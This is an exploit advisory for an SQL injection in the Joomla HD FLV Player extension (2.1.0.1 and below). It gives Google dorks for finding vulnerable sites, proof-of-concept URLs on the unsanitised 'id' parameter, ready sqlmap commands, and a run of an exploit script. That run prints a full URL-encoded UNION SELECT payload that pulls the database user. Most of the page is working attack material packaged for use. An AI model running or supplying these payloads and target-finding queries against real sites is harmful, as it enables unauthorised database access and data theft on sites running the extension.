Joomla HD FLV Player SQL Injection Vulnerability

joomla hd flv

Info

# Exploit Title :  Joomla HD FLV Player 2.1.0.1 and below SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1:  inurl:/component/hdflvplayer/
# Dork google 2:  inurl:com_hdflvplayer    
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info: The variable "id" is not sanitized (again)
#       Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/-EdOQSjAhW8
#
# Poc: 
#      http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]
#      http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)
#
# Poc sqlmap:
#            sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql
#            sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)

Exploit Preview

claudio@backbox3:~/claudio$ python j00m_hd_flv_sql_injection.py -t http://10.0.0.67/joomla

        _______                      __           ___ ___ ______      
       |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \     
       |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \    
       |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \   
       |:  1   |                                 |:  |   |:  1    /   
       |::.. . |                                 |::.|:. |::.. . /    
       `-------'                                 `--- ---`------'     
        _______ ___     ___ ___     _______ __                        
       |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.
       |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|
       |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|  
       |:  |   |:  1   |:  1   |   |:  |            |_____|           
       |::.|   |::.. . |\:.. ./    |::.|                              
       `---'   `-------' `---'     `---' 
                                              <= 2.1.0.1 Sql Injection

                                Written by:

                              Claudio Viviani

                           http://www.homelab.it

                              info@homelab.it
                          homelabit@protonmail.ch

                      https://www.facebook.com/homelabit
                        https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
             https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[+] Searching HD FLV Extension...: FOUND
[+] Checking Version: 2.1.0.1
[+] Exploiting...please wait: ###################
[!] VULNERABLE
[*] Username: pippo@localhost

[*] 3v1l Url: http://10.0.0.67/joomla/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
claudio@backbox3:~/claudio$

Download

Download:
         j00m_hd_flv_sql_injection.py
         j00m_hd_flv_sql_injection.py (Mega Mirror)

Exploit Usage

claudio@backbox3:~$ python j00m_hd_flv_sql_injection.py -t http[s]://localhost[:PORT]
                    python j00m_hd_flv_sql_injection.py -t http[s]://localhost[:PORT]/basedir